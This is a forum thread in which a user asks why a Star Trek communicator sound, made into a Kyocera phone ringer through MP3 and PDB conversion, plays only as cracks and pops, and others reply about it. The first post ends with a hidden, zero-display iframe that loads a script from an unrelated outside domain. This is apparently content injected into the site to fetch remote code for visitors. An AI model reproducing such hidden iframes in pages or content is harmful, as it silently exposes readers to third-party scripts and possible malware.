What's wrong with this ringer?

I found a Star Trek Communicator hail sound as a WAV file, converted it to MP3 using iTunes, use the Kyocera MP3 Ringer Maker program under Virtual PC to create the PDB file, HotSync'd the file, did a soft reset. The new ringer appeared in the list, but, when selected, I only heard a few cracks and pops even though it sounds fine when played as an MP3.

What did I do wrong?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't know what you did wrong, but for this tone, I have already done the work for you. See http://www.smartphonesource.com/vbul...&threadid=5786

OK, maybe it's been too long since I saw an old Star Trek episode, but I thought the hail was the whistle-like sound that sounded like low-high-low (just listen to the one I posted).

If memory serves, that is the sound from the wall communicators on board the ship. I'll take a look at this tomorrow and see if I can see why it didn't make a good ringer for you.
